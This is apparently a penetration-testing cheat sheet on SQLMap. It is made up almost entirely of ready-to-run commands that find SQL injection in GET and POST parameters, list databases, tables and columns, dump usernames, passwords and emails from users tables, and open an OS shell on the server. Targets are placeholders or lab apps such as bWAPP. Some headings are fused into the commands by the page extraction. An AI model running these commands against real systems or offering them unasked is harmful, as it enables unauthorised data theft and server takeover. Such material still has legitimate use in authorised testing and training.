4.3.6 SQLMap
SQLMap
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" #POST MethodGet database if injection Exists
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method
# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dumpGet Tables in a Database
sqlmap -r login.req -D dbname --tables #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST MethodGet data in a Database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump #POST MethodGet OS-Shell
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shellExample of usage
Dumping emails from a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dumpCommon parameters
-u: The vulnerable URL.-p: The parameter you suspect is injectable.--dbms=mysql: You know the backend DBMS is MySQL.--level=5 --risk=3: Enables deeper and riskier tests.--technique=EUBT: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).-D ecommerce: Targeting theecommercedatabase.-T users: Looking into theuserstable.-C email: Only extracting theemailcolumn.--dump: Actually retrieves the data.
Listing columns of a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columnsDumping usernames
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dumpListing columns of the users table again (can be used for planning further dumps)
users table again (can be used for planning further dumps)sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columnsEnumerating tables with specific prefix/suffix
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tablesLast updated